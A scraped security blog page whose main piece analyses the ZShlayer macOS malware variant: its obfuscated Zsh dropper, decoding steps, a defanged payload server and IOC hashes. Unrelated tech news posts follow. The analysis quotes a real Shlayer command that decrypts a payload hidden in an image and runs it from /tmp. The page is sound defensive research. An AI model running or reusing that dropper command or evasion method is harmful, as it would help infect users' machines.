Coming Out of Your Shell: From Shlayer to ZShlayer

/0 Comments/in /by

Earlier this year, we discussed how threat actors have been turning to scripting languages as a preferred means of both dropping malware and executing payloads. That trend has continued with some interesting innovations in response to the static detection signatures now widely in use both by Apple and other vendors. A recent variant of the Shlayer malware follows Apple’s lead in preferring Zsh to Bash as its default shell language and employs a novel encoding method to avoid detection. In this post, we describe this variant and show how it can be decoded to reveal the telltale Shlayer signature.

Didn’t We Just Hear About Shlayer?

Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple’s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs:

sh -c “tail -c +1381 "/Volumes/Install/Installer.app/Contents/Resources/main.png" | openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6" && chmod 777 /tmp/ZQEifWNV2l && /tmp/ZQEifWNV2l "/Volumes/Install/Installer.app/Contents/MacOS/pine" && rm -rf /tmp/ZQEifWNV2l”

The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the /tmp folder.

But Shlayer has been up to other tricks since June of 2020 that have been helping it avoid the static signatures employed by most vendors. Although bypassing Apple’s Notarization checks is obviously a headline grabber, this new variant of Shlayer utilizes heavily obfuscated Zsh scripts and is in fact far more prolific in the wild. Let’s take a look at how this new variant works.

Inside the New ZShlayer Variant

Whereas earlier versions of Shlayer like Shlayer.a came as shell script executables on a removable .DMG disk image, the new ZShlayer malware goes back to using a standard Apple application bundle inside the .DMG.

In place of a Mach-O in the MacOS folder, we instead find this heavily obfuscated Zsh script (only partially shown in the image below):

In the Resources folder, we find two base64 encoded text files.

The entire bundle is codesigned, but it is has not been notarized, indicating that the malware is either intended as a payload for 10.14 or earlier installations or that victims will have to be socially engineered to override the Notarization check. Unlike many other samples we have seen since Catalina was released last year, this one did not include graphical instructions to help the user bypass Apple’s built-in security checks.

This particular sample (c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580), which dates back to early August, has already had its certificate revoked by Apple.

Despite that, due to the use of the Zsh obfuscation, it’s not particularly well-recognized by static signature scanners on VirusTotal, even as of today.

Decoding the First Stage, Zsh Script Payload

In the following, we’ll use this as for our example:

05b0a4a31f38225d5ad9d133d08c892645639c4661b3e239ef2094381366cb62

But the same general method should work across all ZShlayer samples noted at the end of this post.

The Zsh script located in the bundle’s MacOS folder may seem fairly impenetrable at first glance, as indeed it is intended to:

Seeing from the shebang that it’s a shell script, however, immediately tells us that we can isolate each command by introducing a line break at every semicolon.

In BBEdit or similar text editor, we can simply search and replace every semicolon with a semicolon and newline:

Looking toward the end of that output, we can clearly see now where the variable definitions end and the execution logic begins, at line 164:

Note in particular the variable TWm, defined on the penultimate line and executed at line 164. This variable name will prove key as we try to deobfuscate the code.

In order to do that, we’ll first save this modified version of the script with the linebreaks to local disk so that we can use it as input to a python script for decoding. Our script will first of all replace all the variable names with the actual unicode values. Now the line that gets executed looks something like this:

We can echo that code on the command line and print out the unicode in plain text using printf. The full ZShlayer_decode.py script is available here. Here’s what all the above looks like.

And the output:

ZShlayer Second-Stage Payload

You’ll notice from the output that the decoded Zsh script takes as input only the smaller of the two encoded files from the Resources folder; in this case, the smaller file is called “tun_kibitzers_Babbitt”. If we echo the output from this decoded script to the command line, we’ll see why:

Our ZShlayer script decodes into a trademark Shlayer Bash script which now takes the larger file (here called “profanations_detraction”) and outputs it to a newly-created application bundle in the /tmp folder. Classic Shlayer behavior.

Let’s take that script and comment out the last two lines so that we can get the output while still preventing execution:

The unzipped Player.app now in the the /tmp folder looks like a duplicate of the one on the original disk image, with the same executable name as the parent and another Bash script in the Resources folder also called “tun_kibitzers_Babbitt” (in this case). However, note the size is different:

Decoding the new script shows that it drops and executes yet another layer of Bash shell scripting. Here’s the head and tail (sandwiched between the two is a huge chunk of base64):

If you followed (or want to check out) our earlier Scripting Macs with Malice post, you’ll recognize that this is the Shlayer.d variant we wrote about there. The output of

"$(_m "$_t" "$_y")"

is almost identical to the Shlayer.d sample we wrote about earlier; the most significant difference being a new URL from which to retrieve the final payload:

http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

The final payload from this point depends on the context of the executing device. As can be seen above, the script gathers OS version, a session UID and machine ID, all of which it posts to the server for processing.

The server, which appears to have been up for at least two months, is not recognized as malicious on VirusTotal and is currently active with a 200 status code.

As Shlayer payloads have been discussed in detail by other researchers, we refer further analysis of the final payload to already published work such as here and here.

How Prevalent is ZShlayer in the Wild?

Searching for ZShlayer on VirusTotal reveals a large number of individual samples and shows that this variant has been active since late June 2020. As of today, our latest retrohunt showed 172 samples. Some of the parent DMGs of these samples have a reputation score of 0/58 on VT.

Conclusion

The ZShlayer variant of the Shlayer malware on top of the recent Shlayer campaign abusing Apple’s Notarization service is clear evidence that these threat actors are continuing to evolve and are pursuing multiple campaigns against macOS users. A multi-engined behavioral AI solution that can detect malware based on its behavior rather than relying solely on file characteristics continues to be the best way to protect your macOS fleet. If you would like to see how SentinelOne can help protect your business, contact us today or request a free demo.

Indicators of Compromise

ZShlayer Scripts
269d5f15da3bc3522ca53a3399dbaf4848f86de35d78c636a78336d46c23951c
e3292268c1d0830e76c3e80b4ea57921b9171027e07f064ef3b867b6d0450191
93ff20ff59d4e82e9c0e3b08037c48886dc54b8ed37c19894e0a65c1af8612f6
c561d62c786c757a660c47d133b6d23e030a40c4aa08aebe44b8c4a7711da580
16885c2443b610d80b30828b1445ca326adb727c48f06d073e4dcb70fe3e5c2e
1bc5d3cb3d885fad8230e01dc5f86145d16ed5552a0fa8725689635b96b681e1

Parent DMGs
f6cb7f9593d85f0cd1e81d5b9f520b74d9bf5e829206cefe05b956c0f7638c28
3e20c0b2979a368c7d38cf305f1f60693375165bb76150ad80dbd34e7e0550ed
c319761789afb6aa9cddadf340dfa2d4d659e4b420d6dfde9640cdc4c1d813b7
823c4d39b0d93a1358b4fa02539868944ce15df91f78a1142be26edf07a64a5a
45d50559f73e7c12f1d9aa06283182cb67ac953d285f044e77447569ca8a278c
f94c8712dd7716cfeac79e6e59fdca07db4452c5d239593f421f97246ee8ef41

Domains
http[:]//dqb2corklaq0k[.]cloudfront[.]net/
13[.]226[.]23[.]203

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Google Cloud launches its Business Application Platform based on Apigee and AppSheet

/0 Comments/in /by

Unlike some of its competitors, Google Cloud has recently started emphasizing how its large lineup of different services can be combined to solve common business problems. Instead of trying to sell individual services, Google is focusing on solutions and the latest effort here is what it calls its Business Application Platform, which combines the API management capabilities of Apigee with the no-code application development platform of AppSheet, which Google acquired earlier this year.

As part of this process, Google is also launching a number of new features for both services today. The company is launching the beta of a new API Gateway, built on top of the open-source Envoy project, for example. This is a fully managed service that is meant to make it easier for developers to secure and manage their API across Google’s cloud computing services and serverless offerings like Cloud Functions and Cloud Run. The new gateway, which has been in alpha for a while now, offers all the standard features you’d expect, including authentication, key validation and rate limiting.

As for its low-code service AppSheet, the Google Cloud team is now making it easier to bring in data from third-party applications thanks to the general availability to Apigee as a data source for the service. AppSheet already supported standard sources like MySQL, Salesforce and G Suite, but this new feature adds a lot of flexibility to the service.

With more data comes more complexity, so AppSheet is also launching new tools for automating processes inside the service today, thanks to the early access launch of AppSheet Automation. Like the rest of AppSheet, the promise here is that developers won’t have to write any code. Instead, AppSheet Automation provides a visual interface, that, according to Google, “provides contextual suggestions based on natural language inputs.” 

“We are confident the new category of business application platforms will help empower both technical and line of business developers with the core ability to create and extend applications, build and automate workflows, and connect and modernize applications,” Google notes in today’s announcement. And indeed, this looks like a smart way to combine the no-code environment of AppSheet with the power of Apigee .

Google acquires AppSheet to bring no-code development to Google Cloud

Progress snags software automation platform Chef for $220M

/0 Comments/in /by

Progress, a Boston-area developer tool company, boosted its offerings in a big way today when it announced it was acquiring software automation platform Chef for $220 million.

Chef, which went 100% open source last year, had annual recurring revenue (ARR) of $70 million from the commercial side of the house. Needless to say, Progress CEO Yogesh Gupta was happy to bring the company into the fold and gain not only that revenue, but a set of highly skilled employees, a strong developer community and an impressive customer list.

Gupta said that Chef fits with his company’s acquisition philosophy. “This acquisition perfectly aligns with our growth strategy and meets the requirements that we’ve previously laid out: a strong recurring revenue model, technology that complements our business, a loyal customer base and the ability to leverage our operating model and infrastructure to run the business more efficiently,” he said in a statement.

Chef CEO Barry Crist offered a typical argument for an acquired company; that Progress offered a better path to future growth, while sending a message to the open-source community and customers that Progress would be a good steward of the startup’s vision.

“For Chef, this acquisition is our next chapter, and Progress will help enhance our growth potential, support our Open Source vision, and provide broader opportunities for our customers, partners, employees and community,” Crist said in a statement.

Chef’s customer list is certainly impressive, and includes tech industry stalwarts like Facebook, IBM and SAP, as well as non-tech companies like Nordstrom, Alaska Airlines and Capital One.

The company was founded in 2008 and had raised $105 million, according to Crunchbase data. It hadn’t raised any funds since 2015, when it raised a $40 million Series E led by DFJ Growth. Other investors along the way included Battery Ventures, Ignition Partners and Scale Venture Partners.

The transaction is expected to close next month, pending normal regulatory approvals.

Chef goes 100% open source

The $10B JEDI contract is locked, loaded and still completely stuck

/0 Comments/in /by

The other day I took a moment to count the number of stories we’ve done on TechCrunch on the DoD’s $10 billion, decade-long, winner-take-all, JEDI cloud contract. This marks the 30th time we’ve written about this deal over the last two years, and it comes after a busy week last week in JEDI cloud contract news.

That we’re still writing about this is fairly odd if you consider the winner was announced last October when the DoD chose Microsoft, but there is no end in sight to the on-going drama that is this procurement process.

Government contracts don’t typically catch our attention at TechCrunch, but this one felt different early on. There was the size and scope of the deal of course. There was the cute play on the “Star Wars” theme. There was Oracle acting like a batter complaining to the umpire before the first pitch was thrown. There was the fact that everyone thought Amazon would win until it didn’t.

There was a lot going on. In fact, there’s still a lot going on with this story.

Oracle doth protest too much

Let’s start with Oracle, which dispatched CEO Safra Catz to the White House in April 2018 even before the RFP had been written. She was setting the stage to complain that the deal was going to be set up to favor Amazon, something that Oracle alleged until the day Microsoft was picked the winner.

Catz had been on the Trump transition team and so had the ear of the president. While the president certainly interjected himself in this process, it’s not known how much influence that particular meeting might have had. Suffice to say that it was only the first volley in Oracle’s long war against the JEDI contract procurement process.

It would include official complaints with the Government Accountability Office and a federal lawsuit worth not coincidentally $10 billion. It would claim the contract favored Amazon. It would argue that the one-vendor approach wasn’t proper. It would suggest that because the DoD had some former Amazon employees helping write the RFP, that it somehow favored Amazon. The GAO and two court cases found otherwise, ruling against Oracle every single time.

It’s worth noting that the Court of Appeals ruling last week indicated that Oracle didn’t even meet some of the basic contractual requirements, all the while complaining about the process itself from the start.

Oracle loses $10B JEDI cloud contract appeal yet again

Amazon continues to press protests

Nobody was more surprised that Amazon lost the deal than Amazon itself. It still believes to this day that it is technically superior to Microsoft and that it can offer the DoD the best approach. The DoD doesn’t agree. On Friday, it reaffirmed its choice of Microsoft. But that is not the end of this, not by a long shot.

Amazon has maintained since the decision was made last October that the decision-making process had been tainted by presidential interference in the process. They believe that because of the president’s personal dislike of Amazon CEO Jeff Bezos, who also owns the Washington Post, he inserted himself in the process to prevent Bezos’ company from winning that deal.

In January, Amazon filed a motion to stop work on the project until this could all be sorted out. In February, a judge halted work on the project until Amazon’s complaints could be heard by the court. It is September and that order is still in place.

In a blog post on Friday, Amazon reiterated its case, which is based on presidential interference and what it believes is technical superiority. “In February, the Court of Federal Claims stopped performance on JEDI. The Court determined AWS’s protest had merit, and that Microsoft’s proposal likely failed to meet a key solicitation requirement and was likely deficient and ineligible for award. Our protest detailed how pervasive these errors were (impacting all six technical evaluation factors), and the Judge stopped the DoD from moving forward because the very first issue she reviewed demonstrated serious flaws,” Amazon wrote in the post.

DoD reaffirms Microsoft has won JEDI cloud contract, but Amazon legal complaints still pending

Microsoft for the win?

Microsoft on the other hand went quietly about its business throughout this process. It announced Azure Stack, a kind of portable cloud that would work well as a field operations computer system. It beefed up its government security credentials.

Even though Microsoft didn’t agree with the one-vendor approach, indicating that the government would benefit more from the multivendor approach many of its customers were taking, it made clear if those were the rules, it was in it to win it — and win it did, much to the surprise of everyone, especially Amazon.

Yet here we are, almost a year later and in spite of the fact that the DoD found once again, after further review, that Microsoft is still the winner, the contract remains in limbo. Until that pending court case is resolved, we will continue to watch and wait and wonder if this will ever be truly over, and the JEDI cloud contract will actually be implemented.

Even after Microsoft wins, JEDI saga could drag on

Hasura raises $25 million Series B and adds MySQL support to its GraphQL service

/0 Comments/in /by

Hasura, a service that provides developers with an open-source engine that provides them a GraphQL API to access their databases, today announced that it has raised a $25 million Series B round led by Lightspeed Venture Partners. Previous investors Vertex Ventures US, Nexus Venture Partners, Strive VC and SAP.iO Fund also participated in this round.

The new round, which the team raised after the COVID-19 pandemic had already started, comes only six months after the company announced its $9.9 million Series A round. In total, Hasura has now raised $36.5 million.

“We’ve been seeing rapid enterprise traction in 2020. We’ve wanted to accelerate our efforts investing in the Hasura community and our cloud product that we recently launched and to ensure the success of our enterprise customers. Given the VC inbound interest, a fundraise made sense to help us step on the gas pedal and give us room to grow comfortably,” Hasura co-founder and CEO Tanmai Gopal told me.

In addition to the new funding, Hasura also today announced that it has added support for MySQL databases. Until now, the company’s service only worked with PostgreSQL databases.

Rajoshi Ghosh, co-founder and COO (left) and Tanmai Gopal, co-founder and CEO (right).

Rajoshi Ghosh, co-founder and COO (left) and Tanmai Gopal, co-founder and CEO (right). Image Credits: Hasura

As the company’s CEO and co-founder Tanmai Gopal told me, MySQL support has long been at the top of the most requested features by the service’s users. Many of these users — who are often in the healthcare and financial services industry — are also working with legacy systems they are trying to connect to modern applications and MySQL plays an important role there, given how long it has been around.

In addition to adding MySQL support, Hasura is also adding support for SQL Server to its lineup, but for now, that’s in early access.

“For MySQL and SQL Server, we’ve seen a lot of demand from our healthcare and financial services / fin-tech users,” Gopal said. “They have a lot of existing online data, especially in these two databases, that they want to activate to build new capabilities and use while modernizing their applications.

Today’s announcement also comes only a few months after the company launched a fully managed cloud service for its service, which complements its existing paid Pro service for enterprises.

“We’re very impressed by how developers have taken to Hasura and embraced the GraphQL approach to building applications,” said Gaurav Gupta, partner at Lightspeed Venture Partners and Hasura board member. “Particularly for front-end developers using technologies like React, Hasura makes it easy to connect applications to existing databases where all the data is without compromising on security and performance. Hasura provides a lovely bridge for re-platforming applications to cloud-native approaches, so we see this approach being embraced by enterprise developers as well as front-end developers more and more.”

The company plans to use the new funding to add support for more databases and to tackle some of the harder technical challenges around cross-database joins and the company’s application-level data caching system. “We’re also investing deeply in company building so that we can grow our GTM and engineering in tandem and making some senior hires across these functions,” said Gopal.

Hasura launches managed cloud service for its open-source GraphQL API platform

Microsoft Patch Tuesday, Sept. 2020 Edition

/0 Comments/in /by

Microsoft today released updates to remedy nearly 130 security vulnerabilities in its Windows operating system and supported software. None of the flaws are known to be currently under active exploitation, but 23 of them could be exploited by malware or malcontents to seize complete control of Windows computers with little or no help from users.

The majority of the most dangerous or “critical” bugs deal with issues in Microsoft’s various Windows operating systems and its web browsers, Internet Explorer and Edge. September marks the seventh month in a row Microsoft has shipped fixes for more than 100 flaws in its products, and the fourth month in a row that it fixed more than 120.

Among the chief concerns for enterprises this month is CVE-2020-16875, which involves a critical flaw in the email software Microsoft Exchange Server 2016 and 2019. An attacker could leverage the Exchange bug to run code of his choosing just by sending a booby-trapped email to a vulnerable Exchange server.

“That doesn’t quite make it wormable, but it’s about the worst-case scenario for Exchange servers,” said Dustin Childs, of Trend Micro’s Zero Day Initiative. “We have seen the previously patched Exchange bug CVE-2020-0688 used in the wild, and that requires authentication. We’ll likely see this one in the wild soon. This should be your top priority.”

Also not great for companies to have around is CVE-2020-1210, which is a remote code execution flaw in supported versions of Microsoft Sharepoint document management software that bad guys could attack by uploading a file to a vulnerable Sharepoint site. Security firm Tenable notes that this bug is reminiscent of CVE-2019-0604, another Sharepoint problem that’s been exploited for cybercriminal gains since April 2019.

Microsoft fixed at least five other serious bugs in Sharepoint versions 2010 through 2019 that also could be used to compromise systems running this software. And because ransomware purveyors have a history of seizing upon Sharepoint flaws to wreak havoc inside enterprises, companies should definitely prioritize deployment of these fixes, says Alan Liska, senior security architect at Recorded Future.

Todd Schell at Ivanti reminds us that Patch Tuesday isn’t just about Windows updates: Google has shipped a critical update for its Chrome browser that resolves at least five security flaws that are rated high severity. If you use Chrome and notice an icon featuring a small upward-facing arrow inside of a circle to the right of the address bar, it’s time to update. Completely closing out Chrome and restarting it should apply the pending updates.

Once again, there are no security updates available today for Adobe’s Flash Player, although the company did ship a non-security software update for the browser plugin. The last time Flash got a security update was June 2020, which may suggest researchers and/or attackers have stopped looking for flaws in it. Adobe says it will retire the plugin at the end of this year, and Microsoft has said it plans to completely remove the program from all Microsoft browsers via Windows Update by then.

Before you update with this month’s patch batch, please make sure you have backed up your system and/or important files. It’s not uncommon for Windows updates to hose one’s system or prevent it from booting properly, and some updates even have known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

As always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.

The Good, the Bad and the Ugly in Cybersecurity – Week 36

/0 Comments/in /by

The Good

A Colorado man named Bryan Connor Herrell, who worked as a moderator on the now defunct Darknet site “AlphaBay Market”, was sentenced to 11 years in prison by the U.S. District Court.

The site, which was taken down in a joint operation by the FBI along with Thai and Canadian police, served as a marketplace for buyers and sellers of guns, stolen identity information, credit card numbers and other illicit materials. At one time, AlphaBay was the world’s largest online drug marketplace. As a moderator, Herrell helped settle disputes between buyers and sellers. He was clearly dedicated to his work, helping to resolve over 20,000 such disputes.

Herrell’s capture came as a result of the site’s founder and admin Alexandre Cazes being arrested in Thailand in 2017. Cazes, who was subsequently found dead in his prison cell only a few days later, kept a laptop full of incriminating evidence. The FBI had seized the device and were able to retrieve troves of information related to the site’s infrastructure and staff, including the involvement of Herrell. While Herrell’s trial took several years to conclude, the sentence is severe and should serve as warning to others interested in exploring the murky paths of the criminal underground.

Other good news this week comes from Facebook and Twitter, both of which suspended several accounts affiliated with Russian State actors. The accounts belonged to “PeaceData”, a fake news website publishing misleading articles about world politics.

The two social networks said they started an investigation into accounts associated with the site after they received a tip from the FBI earlier this summer. The information was passed also to an independent research body Graphika, which confirmed that the site and associated social media assets were linked to the infamous Russian troll farm “Internet Research Agency” (IRA).

Hopefully, this action is a sign of social media platforms starting to take a more determined stand against fake news and online manipulation.

The Bad

The Parliament of Norway, also known as “The Storting”, was the target of a cyber attack this week that breached the email accounts of several MPs and members of staff. Emails belonging to the Conservative party (Høyre) were among those hacked, but it is unknown at this point if the account of PM Erna Solberg or any government ministers were affected. The opposition Labour party (Arbeiderpartiet) email account was also hacked, suggesting the attack was conducted by an external perpetrator.

“This has been a significant attack,” said Marianne Andreassen, the parliament’s non-elected chief administrator. “Today’s threat situation is challenging, and IT security is something that we are always reviewing. New measures to reinforce security in the Storting are continually being assessed,” she added.

The Parliament has reported the incident to Norwegian police security service (PST), which then tweeted that they were investigating the case. The next Norwegian parliamentary election is scheduled to be held a year from now, in September 2021, and the fears are that this attack might be a prelude to foreign interference in next year’s election.

The Ugly

Still with politics and cybercrime, the Twitter account of the personal website of Indian Prime Minister Narendra Modi has also been hacked this week. The perpertators posted a series of tweets appealing to his 2.5 million followers to donate to the PM National Relief Fund with Bitcoin.

The tweets read, “I appeal to you all to donate generously to PM National Relief Fund for Covid-19, Now India begin with cryptocurrency.”

Subsequent tweets revealed the identity of the hackers to be a group called “John Wick” (referencing the movie franchise starring Keanu Reeves), which was accused earlier this week of hacking a famous Indian E-commerce website “Paytm Mall” and demanding a ransom. It appears that the hacking group wanted to clear its name and so hacked a high-profile Twitter account and used it to shout to the world that they were not to blame for the Paytm Mall hack.

Twitter is investigating the breach of the Indian PM’s account (the account has been reset since, and the hackers’ tweets deleted), which follows in the steps of the much publicized incident in July when hackers gained access to around 130 celebrity accounts, using them to tweet in concert in an attempt to get people to “donate” to a special Bitcoin wallet. This is another reminder that social media accounts of national and political leaders are high-value assets and need to be protected as such to reduce the risk of manipulation and misconduct on a national or even international level.

Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Teemyco creates virtual offices so you can grab a room and talk with colleagues

/0 Comments/in /by

Meet Teemyco, a Stockholm-based startup that wants to reproduce office interactions in a virtual environment. The company wants to foster spontaneous interactions and casual collaboration with a room-based interface. Each employee moves from one room to another just like in a physical office.

If you’re no longer working from an office, chances are you rely heavily on email, Slack, Microsoft Teams, Zoom, Google Meet or a combination of all those tools. While those tools work perfectly fine for what they’re designed to achieve, many companies feel like important information is getting lost. It’s harder to bump into a colleague next to the coffee machine and ask a quick question.

With Teemyco, each person is working in a virtual room. By default, you work in the lobby. You can consider it as an open space with multiple desks. When you want to get together for a planned or unplanned meeting, you can pull someone from the lobby and create another room.

In that room, you can start an audio call or a video call. You can see your colleagues in the corner of your screen and stay focused on a document at the same time, or you can put a video call in full screen. When someone is done, they can leave the room.

Those interactions are less formal than what you get with video-conferencing services. You don’t have to send a link to a Zoom room, you don’t have to send a calendar invite. People hop in and hop out.

If you’re working on something important, you can move to a focus room so that you don’t get interrupted every 15 minutes. Other people won’t be able to pull you from your virtual desk. If you have to run some errands, you can also put yourself in a room that says you’re not there — those rooms can act as a status.

Teemyco also helps you work next to your favorite colleague. You can create a room and use a walkie-talkie feature for quick interactions throughout the day. And, of course, you can create a break room for non-work-related discussions.

Teemyco is still a young company. The product is only available in beta. The company raised a $1 million seed round led by Luminar Ventures with Antler, Gazella and various business angels also participating.

It’s also not going to work for all companies. I’m not sure it scales well for a company with hundreds of employees, for instance. Introverts might not be fans of real-time communication either.

If you’re a remote-first company, you know that it’s important to have a culture of transparency. And written information is always more transparent than video conferences.

And yet, depending on your corporate culture, something like Teemyco can be useful. It can augment information stored in shared documents and internal communication tools.

It’s an interesting product that proves that the inevitable debate between physical offices and remote teams is not a binary problem. There is some granularity, and companies can adjust the knob depending on specific needs.

DoD reaffirms Microsoft has won JEDI cloud contract, but Amazon legal complaints still pending

/0 Comments/in /by

We have seen a lot of action this week as the DoD tries to finally determine the final winner of the $10 billion, decade-long DoD JEDI cloud contract. Today, the DoD released a statement that after reviewing the proposals from finalists Microsoft and Amazon again, it reiterated that Microsoft was the winner of the contract.

“The Department has completed its comprehensive re-evaluation of the JEDI Cloud proposals and determined that Microsoft’s proposal continues to represent the best value to the Government. The JEDI Cloud contract is a firm-fixed-price, indefinite-delivery/indefinite-quantity contract that will make a full range of cloud computing services available to the DoD,” the DoD said in a statement.

This comes on the heels of yesterday’s Court of Appeals decision denying Oracle’s argument that the procurement process was flawed and that there was a conflict of interest because a former Amazon employee helped write the requirements for the RFP.

Oracle loses $10B JEDI cloud contract appeal yet again

While the DoD has determined that it believes that Microsoft should still get the contract, after selecting them last October, that doesn’t mean this is the end of the line for this long-running saga. In fact, a federal judge halted work on the project in February pending a hearing on an ongoing protest from Amazon, which believes it should have won based on merit, and the fact it believes the president interfered with the procurement process to prevent Jeff Bezos, who owns The Washington Post, from getting the lucrative contract.

The DoD confirmed that the project could not begin until the legal wrangling was settled. “While contract performance will not begin immediately due to the Preliminary Injunction Order issued by the Court of Federal Claims on February 13, 2020, DoD is eager to begin delivering this capability to our men and women in uniform,” the DoD reported in a statement.

A Microsoft spokesperson said the company was ready to get to work on the project as soon as it got the OK to proceed. “We appreciate that after careful review, the DoD confirmed that we offered the right technology and the best value. We’re ready to get to work and make sure that those who serve our country have access to this much needed technology,” a Microsoft spokesperson told TechCrunch .

Meanwhile, in a blog post published late this afternoon, Amazon made it clear that it was unhappy with today’s outcome and will continue to pursue legal remedy for what they believe to be presidential interference that has threatened the integrity of the procurement process. Here’s how they concluded the blog post:

We strongly disagree with the DoD’s flawed evaluation and believe it’s critical for our country that the government and its elected leaders administer procurements objectively and in a manner that is free from political influence. The question we continue to ask ourselves is whether the President of the United States should be allowed to use the budget of the Department of Defense to pursue his own personal and political ends? Throughout our protest, we’ve been clear that we won’t allow blatant political interference, or inferior technology, to become an acceptable standard. Although these are not easy decisions to make, and we do not take them lightly, we will not back down in the face of targeted political cronyism or illusory corrective actions, and we will continue pursuing a fair, objective, and impartial review.

While today’s statement from DoD appears to take us one step closer to the end of the road for this long-running drama, it won’t be over until the court rules on Amazon’s arguments. It’s clear from today’s blog post that Amazon has no intention of stepping down.

Note: We have  updated this story with content from an Amazon blog post responding to this news.

Judge temporarily halts work on JEDI contract until court can hear AWS protest

Avo raises $3M for its analytics governance platform

/0 Comments/in /by

Avo, a startup that helps businesses better manage their data quality across teams, today announced that it has raised a $3 million seed round led by GGV Capital, with participation from  Heavybit, Y Combinator and others.

The company’s founder, Stefania Olafsdóttir, who is currently based in Iceland, was previously the head of data science at QuizUp, which at some point had 100 million users around the world. “I had the opportunity to build up the Data Science Division, and that meant the cultural aspect of helping people ask and answer the right questions — and get them curious about data — but it also meant the technical part of setting up the infrastructure and tools and pipelines, so people can get the right answers when they need it,” she told me. “We were early adopters of self-serve product analytics and culture — and we struggled immensely with data reliability and data trust.”

Image Credits: Avo

As companies collect more data across products and teams, the process tends to become unwieldy and different teams end up using different methods (or just simply different tags), which creates inefficiencies and issues across the data pipeline.

“At first, that unreliable data just slowed down decision making, because people were just like, didn’t understand the data and needed to ask questions,” Olafsdóttir said about her time at QuizUp. “But then it caused us to actually launch bad product updates based on incorrect data.” Over time, that problem only became more apparent.

“Once organizations realize how big this issue is — that they’re effectively flying blind because of unreliable data, while their competition might be like taking the lead on the market — the default is to patch together a bunch of clunky processes and tools that partially increase the level of liability,” she said. And that clunky process typically involves a product manager and a spreadsheet today.

At its core, the Avo team set out to build a better process around this, and after a few detours and other product ideas, Olafsdóttir and her co-founders regrouped to focus on exactly this problem during their time in the Y Combinator program.

Avo gives developers, data scientists and product managers a shared workspace to develop and optimize their data pipelines. “Good product analytics is the product of collaboration between these cross-functional groups of stakeholders,” Olafsdóttir argues, and the goal of Avo is to give these groups a platform for their analytics planning and governance — and to set company-wide standards for how they create their analytics events.

Once that is done, Avo provides developers with typesafe analytics code and debuggers that allows them to take those snippets and add them to their code within minutes. For some companies, this new process can help them go from spending 10 hours on fixing a specific analytics issue to an hour or less.

Most companies, the team argues, know — deep down — that they can’t fully trust their data. But they also often don’t know how to fix this problem. To help them with this, Avo also today released its Inspector product. This tool processes event streams for a company, visualizes them and then highlights potential errors. These could be type mismatches, missing properties or other discrepancies. In many ways, that’s obviously a great sales tool for a service that aims to avoid exactly these problems.

One of Avo’s early customers is Rappi, the Latin American delivery service. “This year we scaled to meet the demand of 100,000 new customers digitizing their deliveries and curbside pickups. The problem with every new software release was that we’d break analytics. It represented 25% of our Jira tickets,” said Rappi’s head of Engineering, Damian Sima. “With Avo we create analytics schemas upfront, identify analytics issues fast, add consistency over time and ensure data reliability as we help customers serve the 12+ million monthly users their businesses attract.”

As most startups at this stage, Avo plans to use the new funding to build out its team and continue to develop its product.

“The next trillion-dollar software market will be driven from the ground up, with developers deciding the tools they use to create digital transformation across every industry. Avo offers engineers ease of implementation while still retaining schemas and analytics governance for product leaders,” said GGV Capital Managing Partner Glenn Solomon. “Our investment in Avo is an investment in software developers as the new kingmakers and product leaders as the new oracles.”